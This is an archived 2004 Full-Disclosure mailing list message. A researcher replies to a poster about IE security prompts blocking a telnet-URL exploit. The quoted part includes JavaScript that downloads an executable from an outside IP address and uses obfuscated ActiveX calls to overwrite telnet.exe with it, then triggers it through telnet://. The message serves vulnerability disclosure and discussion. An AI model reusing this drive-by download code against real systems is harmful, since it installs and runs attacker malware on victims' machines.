lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <200407210225.i6L2PXqb029710@cairo.anu.edu.au>
From: avalon at cairo.anu.edu.au (Darren Reed)
Subject: telnet URL type used in exploit

Michael,

Out of curiosity, I tested this with IE 6.0.2800.1106.xpsp2.030422-1633
and got a popup box saying:

"This page is accessing information that is not under its
control. This poses a security risk. Do you want to
continue?" [Yes] [No]

And that was loading it into IE as a *local file*...when I put it on
a web page, I got the usual half dozen alerts about "do you want to run
javascript", etc. that even if I said yes to it didn't work.  

Did you get that popup box when you tested your script below ?

Darren

> In reply the discussion found at: 
> 
> http://seclists.org/lists/fulldisclosure/2004/Jul/0528.html
> 
> the consesus seems to be that there are no obvious ways to exploit the
> mentioned URL types, such as tn3270, telnet, LDAP, rlogin etc. While
> these may not be exploitable per se, they certainly are when used in
> conjction with other known exploits. Take the following code for
> example:
> 
> var downloadurl="http://213.159.117.133/dl/loadadv74.exe";
> 
> if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
> savetopath="C:\\WINDOWS\\system32\\telnet.exe";
> 
> if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1)
> savetopath="C:\\WINNT\\system32\\telnet.exe";
> 
> payloadURL = downloadurl;
> 
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET",payloadURL,0);
> x.Send();
> 
> function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t"
> + "r" + "e" + "a" + "m"; }
> var s = new ActiveXObject(bla());
> 
> s.Mode = 3;
> s.Type = 1;
> s.Open();
> s.Write(x.responseBody);
> s.SaveToFile(savetopath,2);
> 
> location.href = "telnet://";
> 
> The JavaScript overwrites telnet.exe with a downloaded executable and
> then runs it by pointing the browser at telnet://. Instead of
> launching a telnet shell as expected, the attackers code is executed.
> This is not only an example of the telnet URL type being involved in
> an exploit, but one that actually relies on it.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ